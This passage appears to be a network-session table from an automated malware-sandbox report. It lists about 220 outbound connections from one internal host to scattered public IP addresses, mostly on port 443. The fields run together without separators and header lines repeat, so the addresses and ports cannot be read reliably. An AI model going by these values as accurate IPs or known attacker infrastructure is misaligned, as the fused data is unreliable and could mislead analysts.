                                      16305192.168.2.144435686.25.165.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16306192.168.2.146078464.77.105.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16307192.168.2.1438434190.68.137.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16308192.168.2.145458436.45.149.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16309192.168.2.145771090.95.49.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16310192.168.2.1456030128.143.240.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16311192.168.2.1451608114.50.122.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16312192.168.2.1449430221.65.193.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16313192.168.2.1436264191.55.206.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16314192.168.2.145097049.79.71.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16315192.168.2.1457082173.132.140.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16316192.168.2.1447450193.41.129.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16317192.168.2.1458070107.211.106.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16318192.168.2.1433438148.23.155.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16319192.168.2.1435958150.135.136.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16320192.168.2.1458210174.154.102.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16321192.168.2.1433790199.28.74.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16322192.168.2.1455818111.153.161.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16323192.168.2.1437644139.214.78.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16324192.168.2.1454984140.98.193.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16325192.168.2.1459042139.46.79.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16326192.168.2.145395424.228.84.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16327192.168.2.1433972186.90.151.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16328192.168.2.143932653.171.18.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16329192.168.2.1456976134.49.187.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16330192.168.2.1436278103.249.41.408080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16331192.168.2.1439444192.142.35.428080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16332192.168.2.1433556104.3.90.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16333192.168.2.145170239.189.67.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16334192.168.2.143725284.11.42.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16335192.168.2.1433290135.28.62.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16336192.168.2.1460932100.48.17.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16337192.168.2.1434262198.99.98.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16338192.168.2.1445232156.35.89.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16339192.168.2.1450396135.82.31.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16340192.168.2.1435642212.252.201.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16341192.168.2.1446102165.138.163.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16342192.168.2.1435450189.89.198.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16343192.168.2.1438922167.34.135.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16344192.168.2.14581825.107.120.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16345192.168.2.1445406136.103.157.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16346192.168.2.1450548151.172.246.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16347192.168.2.1456752173.111.32.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16348192.168.2.1455928208.162.24.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16349192.168.2.1445260221.54.98.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16350192.168.2.1433608221.17.204.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16351192.168.2.1445546190.209.144.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16352192.168.2.1459176111.222.190.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16353192.168.2.144476275.229.73.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16354192.168.2.1456804191.226.21.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16355192.168.2.1451058153.16.127.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16356192.168.2.144740688.59.10.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16357192.168.2.1436452164.235.250.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16358192.168.2.1433930202.82.176.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16359192.168.2.1458366149.240.34.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16360192.168.2.143469694.74.91.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16361192.168.2.1433110190.252.139.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16362192.168.2.1435884162.239.132.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16363192.168.2.1447256183.255.169.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16364192.168.2.145801444.136.64.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16365192.168.2.14571225.148.85.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16366192.168.2.145975224.247.167.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16367192.168.2.143650257.219.153.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16368192.168.2.1441278180.61.161.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16369192.168.2.1459328179.105.120.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16370192.168.2.1439824207.164.118.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16371192.168.2.1457750192.145.118.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16372192.168.2.1448294162.196.194.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16373192.168.2.1454610102.208.121.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16374192.168.2.145353261.137.241.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16375192.168.2.1450220157.107.233.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16376192.168.2.14539821.195.216.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16377192.168.2.145648698.78.113.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16378192.168.2.143819818.44.200.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16379192.168.2.1436836108.10.230.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16380192.168.2.145023827.44.200.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16381192.168.2.1458082163.93.65.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16382192.168.2.1447914110.218.204.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16383192.168.2.143778812.130.34.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16384192.168.2.1451430145.153.51.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16385192.168.2.145699269.24.158.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16386192.168.2.1459582109.230.92.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16387192.168.2.1441982146.118.120.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16388192.168.2.143673424.207.5.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16389192.168.2.145306246.47.177.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16390192.168.2.145822260.8.247.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16391192.168.2.144931437.48.153.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16392192.168.2.1455420176.74.243.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16393192.168.2.145061087.16.114.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16394192.168.2.144110675.147.215.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16395192.168.2.1460040184.127.164.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16396192.168.2.144699823.18.184.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16397192.168.2.1455748164.92.236.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16398192.168.2.144833636.80.201.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16399192.168.2.143920641.127.176.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16400192.168.2.1459180119.221.15.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16401192.168.2.144440896.163.54.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16402192.168.2.1450544123.239.50.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16403192.168.2.1438900141.55.120.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16404192.168.2.143359283.53.230.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16405192.168.2.1453284191.89.205.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16406192.168.2.14345729.193.186.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16407192.168.2.14573725.80.253.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16408192.168.2.143856492.125.226.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16409192.168.2.1438122200.171.219.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16410192.168.2.144872684.2.248.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16411192.168.2.145652444.175.43.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16412192.168.2.1446920128.164.209.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16413192.168.2.1442902134.179.73.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16414192.168.2.1438810170.145.245.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16415192.168.2.146009485.136.82.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16416192.168.2.1449560200.13.58.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16417192.168.2.1453820156.92.83.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16418192.168.2.1437284122.101.131.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16419192.168.2.144792692.202.7.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16420192.168.2.1449570104.142.220.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16421192.168.2.1434124199.6.253.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16422192.168.2.1458884185.169.72.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16423192.168.2.145967814.45.5.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16424192.168.2.143607495.74.238.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16425192.168.2.1441664152.148.198.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16426192.168.2.1458806116.103.165.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16427192.168.2.143338298.96.222.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16428192.168.2.143291614.112.54.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16429192.168.2.1454696117.34.158.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16430192.168.2.1455484209.117.34.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16431192.168.2.1459932207.187.240.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16432192.168.2.144242681.75.202.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16433192.168.2.1442010119.241.213.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16434192.168.2.1441014195.56.231.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16435192.168.2.1453316139.208.176.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16436192.168.2.144010095.201.181.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16437192.168.2.1447848129.212.86.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16438192.168.2.1444696142.6.116.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16439192.168.2.1442852204.163.182.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16440192.168.2.144622051.120.251.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16441192.168.2.146064054.225.195.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16442192.168.2.1447914201.155.63.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16443192.168.2.145898891.141.69.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16444192.168.2.144429457.0.19.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16445192.168.2.143445499.155.95.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16446192.168.2.145395887.37.46.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16447192.168.2.145497027.166.165.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16448192.168.2.1436412112.17.92.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16449192.168.2.144219082.155.184.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16450192.168.2.1452172168.241.205.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16451192.168.2.14408244.117.164.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16452192.168.2.1453418191.204.103.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16453192.168.2.1442874199.45.201.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16454192.168.2.1442102174.21.10.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16455192.168.2.1442354180.231.74.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16456192.168.2.144640479.153.208.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16457192.168.2.144760276.187.12.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16458192.168.2.1439432140.206.51.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16459192.168.2.1439256149.214.115.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16460192.168.2.1459494218.47.164.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16461192.168.2.1437974208.152.39.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16462192.168.2.1453752111.175.40.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16463192.168.2.143586820.36.65.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16464192.168.2.145711868.56.189.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16465192.168.2.143776274.140.97.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16466192.168.2.144764698.153.248.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16467192.168.2.146062858.201.101.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16468192.168.2.1451960182.31.96.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16469192.168.2.144307636.13.243.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16470192.168.2.145145673.125.117.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16471192.168.2.145721858.202.4.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16472192.168.2.145017613.14.50.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16473192.168.2.1436564128.166.152.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16474192.168.2.145467034.129.135.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16475192.168.2.1441812193.53.232.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16476192.168.2.1451882213.213.172.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16477192.168.2.1449694221.162.81.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16478192.168.2.1444986184.231.212.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16479192.168.2.143372447.227.28.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16480192.168.2.1448878118.200.148.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16481192.168.2.1452758222.37.145.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16482192.168.2.143458234.162.214.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16483192.168.2.1454720219.218.73.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16484192.168.2.143666876.108.149.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16485192.168.2.144022243.253.29.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16486192.168.2.1435812189.103.180.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16487192.168.2.1448248164.152.23.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16488192.168.2.1459132101.33.97.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16489192.168.2.1456704146.240.6.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16490192.168.2.1455186113.184.63.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16491192.168.2.145788497.149.229.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16492192.168.2.143753813.108.60.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16493192.168.2.1449246105.214.101.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16494192.168.2.1442064181.202.57.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16495192.168.2.1436568171.206.65.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16496192.168.2.143750867.153.59.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16497192.168.2.1453642162.235.153.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16498192.168.2.1451636135.238.18.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16499192.168.2.14436782.74.72.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16500192.168.2.1446904132.186.52.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16501192.168.2.1449958179.243.27.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16502192.168.2.1438792175.114.75.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16503192.168.2.1444732140.53.82.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16504192.168.2.1452112173.237.38.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16505192.168.2.145226674.216.91.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16506192.168.2.1456658169.82.251.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16507192.168.2.146030842.94.51.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16508192.168.2.145467269.109.193.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16509192.168.2.1438490154.72.253.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16510192.168.2.145099276.120.62.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16511192.168.2.1435050211.243.153.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16512192.168.2.145565461.42.140.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16513192.168.2.1443268126.149.157.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16514192.168.2.1456536130.72.115.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16515192.168.2.1446252185.214.70.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16516192.168.2.1453694149.196.75.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16517192.168.2.1438840217.107.54.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16518192.168.2.1437774162.68.3.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16519192.168.2.146044864.41.49.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16520192.168.2.143718657.66.1.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16521192.168.2.1437454145.52.149.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16522192.168.2.1458146163.82.243.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16523192.168.2.144179613.177.151.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16524192.168.2.1441172177.213.34.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16525192.168.2.145750843.125.14.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16526192.168.2.1442510182.64.1.10443
                                      TimestampBytes transferredDirectionData


